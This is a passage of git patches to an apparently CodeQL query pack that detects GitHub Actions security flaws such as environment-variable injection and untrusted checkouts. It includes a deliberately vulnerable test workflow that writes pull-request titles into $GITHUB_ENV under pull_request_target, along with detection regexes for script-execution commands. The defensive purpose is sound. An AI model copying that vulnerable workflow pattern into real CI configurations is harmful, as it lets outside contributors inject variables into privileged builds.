EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { + EnvVarInjectionFromFileReadRunStep() { + exists(string content, string value| writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and - value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") + outputsPartialFileContent(value) ) } } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 11f17ae26239..dc835e7dab21 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -54,10 +54,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)(\\s+|;|$)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] + - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] + - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] + - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml new file mode 100644 index 000000000000..36340258515e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -0,0 +1,28 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=${TITLE##*/} + echo PR_TITLE=${FOO} >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=$TITLE+ + echo PR_TITLE=$FOO >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + venv="$(echo $TITLE)')" + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + + + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 0dbff9553183..9c2fd6faf465 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -36,6 +39,12 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -50,3 +59,6 @@ subpaths | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 5641ea53afd2..7ea9865c70a9 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -36,5 +39,11 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select From 39bff38d700f5f0b5bcb169dd210db7956348800 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:32:18 +0200 Subject: [PATCH 369/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30120f7d321f..16c801a0bad2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.8 +version: 0.1.9 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dad05ff4af39..4f1173bd9adc 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.8 +version: 0.1.9 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1281ca8e813069d2367b0bc6198ba29543826e3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Jul 2024 23:01:38 +0200 Subject: [PATCH 370/707] Bump qlpack versions --- ql/lib/codeql/actions/Ast.qll | 11 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 73 +++++++++++++++---- ql/lib/qlpack.yml | 2 +- .../Security/CWE-285/ImproperAccessControl.ql | 2 +- .../UntrustedCheckoutTOCTOUCritical.ql | 40 +++++++--- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 36 ++++++--- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- ql/src/qlpack.yml | 2 +- .../UntrustedCheckoutTOCTOUCritical.expected | 27 ++++++- .../UntrustedCheckoutCritical.expected | 24 +++--- .../CWE-829/UntrustedCheckoutHigh.expected | 41 +++++------ 13 files changed, 224 insertions(+), 78 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e837c6fcb303..5e7c6d77c3e6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -198,6 +198,8 @@ abstract class Job extends AstNode instanceof JobImpl { If getIf() { result = super.getIf() } + Environment getEnvironment() { result = super.getEnvironment() } + Permissions getPermissions() { result = super.getPermissions() } Event getATriggerEvent() { result = super.getATriggerEvent() } @@ -242,6 +244,15 @@ class If extends AstNode instanceof IfImpl { string getConditionStyle() { result = super.getConditionStyle() } } +/** + * An Environemnt node representing a deployment environment. + */ +class Environment extends AstNode instanceof EnvironmentImpl { + string getName() { result = super.getName() } + + Expression getNameExpr() { result = super.getNameExpr() } +} + abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2deb987650c8..9d2a5b382063 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -82,6 +82,7 @@ private newtype TAstNode = exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvironmentNode(YamlValue n) { exists(YamlMapping m | m.lookup("environment") = n) } or TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or TScalarValueNode(YamlScalar n) { exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) @@ -793,6 +794,9 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the condition that must be satisfied for this job to run. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + /** Gets the deployment environment to run the job on. */ + EnvironmentImpl getEnvironment() { result.getNode() = n.lookup("environment") } + /** Gets the permissions for this job. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } @@ -976,6 +980,30 @@ class StepImpl extends AstNodeImpl, TStepNode { } } +class EnvironmentImpl extends AstNodeImpl, TEnvironmentNode { + YamlValue n; + + EnvironmentImpl() { this = TEnvironmentNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EnvironmentImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the environment name. */ + string getName() { result = n.(YamlScalar).getValue() } + + /** Gets the environmen name. */ + ExpressionImpl getNameExpr() { result.getParentNode().getNode() = n } +} + class IfImpl extends AstNodeImpl, TIfNode { YamlValue n; diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index fdafda1fc27a..28bc938f8c8e 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,17 +1,49 @@ import actions /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { +abstract class ControlCheck extends AstNode { + ControlCheck() { + this instanceof If or + this instanceof Environment or + this instanceof UsesStep + } + predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + this instanceof If and + ( + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + ) + or + this instanceof Environment and + ( + step.getEnclosingJob().getEnvironment() = this + or + step.getEnclosingJob().getANeededJob().getEnvironment() = this + ) + or + this.(UsesStep).getAFollowingStep() = step } } -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { +abstract class AssociationCheck extends ControlCheck { } + +abstract class ActorCheck extends ControlCheck { } + +abstract class RepositoryCheck extends ControlCheck { } + +abstract class LabelCheck extends ControlCheck { } + +abstract class PermissionCheck extends ControlCheck { } + +class EnvironmentCheck extends ControlCheck instanceof Environment { + EnvironmentCheck() { any() } +} + +class LabelIfCheck extends LabelCheck instanceof If { + LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( @@ -23,8 +55,8 @@ class LabelControlCheck extends ControlCheck { } } -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { +class ActorIfCheck extends ActorCheck instanceof If { + ActorIfCheck() { // eg: github.actor == 'dependabot[bot]' // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' @@ -39,8 +71,8 @@ class ActorControlCheck extends ControlCheck { } } -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { +class RepositoryIfCheck extends RepositoryCheck instanceof If { + RepositoryIfCheck() { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) @@ -49,8 +81,8 @@ class RepositoryControlCheck extends ControlCheck { } } -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { +class AssociationIfCheck extends AssociationCheck instanceof If { + AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( normalizeExpr(this.getCondition()) @@ -63,3 +95,18 @@ class AssociationControlCheck extends ControlCheck { } } +class AssociationActionCheck extends AssociationCheck instanceof UsesStep { + AssociationActionCheck() { + this.getCallee() = "TheModdingInquisition/actions-team-membership" and + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + } +} + +class PermissionActionCheck extends PermissionCheck instanceof UsesStep { + PermissionActionCheck() { + this.getCallee() = "lannonbr/repo-permission-check-action" and + not this.getArgument("permission") = ["write", "admin"] + } +} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 16c801a0bad2..5518e074d30a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.9 +version: 0.1.10 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 16ae5c5fe9b5..cd7cefe2dd31 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -14,7 +14,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.ControlChecks -from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event +from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job = checkout.getEnclosingJob() and job.isPrivileged() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 3a049f67dea7..d28cca11a569 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -1,7 +1,7 @@ /** * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. - * @kind problem + * @kind path-problem * @problem.severity error * @precision high * @security-severity 9.3 @@ -16,21 +16,43 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + +from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and + // the checkout is followed by a known poisonable step + checkout.getAFollowingStep() = s and + // the checkout occurs in a privileged context + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) + ) and // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + check.dominates(checkout) and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck + or // label gates do not depend on the triggering event - check instanceof LabelControlCheck + check instanceof LabelCheck or - // actor or association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. + // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select s, checkout, s, + "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9a1e4c6301a..6448f1a05a85 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,21 +16,37 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +from MutableRefCheckoutStep checkout, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and - // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and - // there are no evidences that the checked-out code can lead to arbitrary code execution + // the checkout occurs in a privileged context + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) + ) and + // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and + // the mutable checkout step is protected by an access check + check.dominates(checkout) and ( + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck + or // label gates do not depend on the triggering event - check instanceof LabelControlCheck + check instanceof LabelCheck or - // actor or Association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. + // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select checkout, + "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 3a87b30be970..c1d72dd46648 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -26,12 +26,12 @@ where j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow." + ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index cb2f1cdaf95f..468a1214c62d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -24,12 +24,12 @@ where j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." + ) and + // the 